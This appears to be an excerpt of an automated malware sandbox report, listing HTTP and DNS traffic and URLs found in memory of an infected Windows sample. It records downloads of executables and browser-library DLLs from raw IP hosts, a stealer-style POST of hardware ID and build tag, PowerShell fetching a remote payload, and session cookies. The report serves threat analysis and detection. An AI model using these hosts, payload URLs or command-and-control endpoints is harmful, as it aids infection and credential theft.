Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgRmgZjcGKSIr7EGIjBaPiH7ydCcW1t0uddwg3g_WoymxNw6oYn7W7bYk_Rw_jH0vMQpLuaIzJERlSBC-bgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-15; NID=513=ilpMolbSmWWnfocYStlsoD43TIKelvk7eazl4EZxvE2SkEimHhQd01qwtpGHEYeVVHYNiEWEs8Dw9WNz5JNG_9L0qgDl6Sicr6x_DUdDuX1fCycKNNji0QeAP6GQGZ0M8HNA4z6Q0LFaT9DNlJFR-yBVS3TfOsDOIITsklKYPls
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKSIr7EGIjD_gy0lEzxGmT4ruUn43olxNd26dv_6t9V1kHHuQNrJ-I6ufJvD3u2tO-YexKH-zpoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-15; NID=513=V9bQiwKLLaVTR4cAvt6Unn9yyEPgJNnLYApBfw8mztlAxzw79yKA920gx3GB7O7pdZ0GuWLMCJE7fpE5FrZ5GTM3deJ5P349iVtScHU03G3_vdNrR463Ms1ZdRnOrRaJtVJpq1Fna2nok34GAZezDhbaJotqmLQzTbkOJkFuPM8
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKSIr7EGIjBNN4QNigwzXQnWujQoDXOdTWRctX9-iQ2o60jrfBaHO86I3LesLUSwtQRWNww27-YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
Source: global traffic	HTTP traffic detected: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 19 Mar 2024 23:10:10 GMTUser-Agent: Microsoft BITS/7.8Host: download.iolo.net
Source: global traffic	HTTP traffic detected: GET /google_ifi_ico.png?rnd=ao4JqF5ZqI8kKu4EL0Gn_LYPC4GYPC9IYPC8OYPC6GYPC8NXPC7NYPC7IYPC7NXPC0VYPC2NXPC3TVPC8 HTTP/1.1Host: service-domain.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /google_ifi_ico.png?rnd=Zd3zh3ZT3XmF8YI2eYS_RGXB9UGXB3SGXB6CHXB7UGXB6FIXB4FHXB1SGXB9FIXB9HGXB6FIXB9JJXB0 HTTP/1.1Host: service-domain.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1Connection: Keep-AliveCache-Control: no-cacheHost: clients2.googleusercontent.com
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1Connection: Keep-AliveCache-Control: no-cacheHost: clients2.googleusercontent.com
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1Connection: Keep-AliveCache-Control: no-cacheHost: clients2.googleusercontent.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCLnKzQEI+cDUFRiPzs0BGNiGzgEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCLnKzQEI+cDUFRiPzs0BGNiGzgEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGO6Ir7EGIjBbMe3eQAtuCL3jg7g0TShqEj30UCC7_atPViR7K19ZkkguPUrDHWkhEYx3h598qBoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGO6Ir7EGIjAT31A6jm3jiUbYeNNo7BDZAsX_AO4Yhqat1pygOlLCpUVzhhDggamCbrUDp4EqjUUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCLnKzQEI+cDUFRiPzs0BGNiGzgEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
Source: global traffic	HTTP traffic detected: GET /ISetup1.exe HTTP/1.1Host: 185.172.128.59Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=one&s=ab&sub=2838 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=one HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?TgRwmotRmvjanFwrAygiXReOJytNrSTXT HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?QBydZwkpsFKAFvVdHIWuWCRJuDNJzwnPw HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?iTfjhKmMUWxsWdQYLjvpBrapSwfuaDFGe HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /clrls/cl_rls.json HTTP/1.1Host: www.rapidfilestorage.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?tiEOSnvauSGeSrVtrRTjdcdKOYxLWZZtj HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.rapidfilestorage.com
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?DBNgrjReMPwMuUWVmgNCxBVhWTyizBQlm HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: helsinki-dtc.com
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt?WgPZvcyXhSTVdehKKNnpLpnrTYhLSWhya HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: skrptfiles.tracemonitors.com

Source: global traffic	DNS traffic detected: DNS query: d68kcn56pzfb4.cloudfront.net
Source: global traffic	DNS traffic detected: DNS query: 240216234727901.mjj.xne26.cfd
Source: global traffic	DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic	DNS traffic detected: DNS query: monoblocked.com
Source: global traffic	DNS traffic detected: DNS query: c.574859385.xyz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic	DNS traffic detected: DNS query: download.iolo.net
Source: global traffic	DNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com
Source: global traffic	DNS traffic detected: DNS query: www.rapidfilestorage.com
Source: global traffic	DNS traffic detected: DNS query: helsinki-dtc.com
Source: global traffic	DNS traffic detected: DNS query: service-domain.xyz
Source: global traffic	DNS traffic detected: DNS query: skrptfiles.tracemonitors.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: api4.check-data.xyz
Source: global traffic	DNS traffic detected: DNS query: api.check-data.xyz

Source: unknown

HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDGHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 42 34 30 36 36 43 39 35 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 2d 2d 0d 0a Data Ascii: ------BAAAAKJKJEBGHJKFHIDGContent-Disposition: form-data; name="hwid"7EB4066C95534228319403------BAAAAKJKJEBGHJKFHIDGContent-Disposition: form-data; name="build"default10------BAAAAKJKJEBGHJKFHIDG--

Source: u2xs.0.exe, 00000008.00000002.3011051937.000000002A916000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe
Source: u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe00
Source: u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
Source: u2xs.0.exe, 00000008.00000002.2977205210.000000000425E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllVA
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll0
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
Source: u2xs.0.exe, 00000008.00000002.2984027332.000000000427A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
Source: u2xs.0.exe, 00000008.00000002.2984027332.000000000427A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dllyd4W
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll(A
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll?
Source: u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp, u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
Source: u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php75b90b663400cbd2dd87518c2b422-released0eb916a7849bfb9cf354
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
Source: u2xs.0.exe, 00000008.00000002.2977205210.000000000425E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76M
Source: powershell.exe, 00000007.00000002.2106716298.00000000053BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://240216234727901.mjj.xne26.cfd
Source: powershell.exe, 00000007.00000002.2106716298.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2106716298.00000000053BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2106716298.000000000539C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://240216234727901.mjj.xne26.cfd/f/fvgbm0216901.txt
Source: MSBuild.exe, 00000045.00000002.3265540539.00000000030D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000
Source: MSBuild.exe, 00000045.00000002.3265540539.00000000030D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
Source: MSBuild.exe, 00000045.00000002.3259175365.000000000142C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4Fe
Source: run.exe, 0000000B.00000002.2396139985.0000000004223000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2649003331.0000000004F92000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 0000000B.00000002.2396139985.0000000004223000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2649003331.0000000004F92000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
